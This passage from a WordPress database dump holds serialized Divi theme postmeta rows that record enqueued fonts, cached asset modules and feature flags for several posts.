:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33963,813,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33964,813,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33950,1097,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33951,1516,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33952,1516,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33953,1516,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33954,1516,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33955,902,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33956,902,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33957,902,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33958,902,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33959,862,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33960,862,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33961,862,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33946,1022,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33947,1097,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33948,1097,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33949,1097,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33941,1129,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33942,1129,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33943,1129,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33944,1022,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33945,1022,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33937,1208,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33938,1208,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33939,1208,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33940,1129,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33935,724,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33936,1208,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33934,724,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33921,585,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33922,585,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33923,585,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33924,1265,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33925,1265,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33926,1265,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33927,1265,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33928,800,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33929,800,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33930,800,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33931,800,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33932,724,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33933,724,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33916,918,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33917,918,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33918,918,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33919,918,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33920,585,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33912,625,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33913,625,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33914,625,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33915,625,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33909,1536,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33910,1536,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8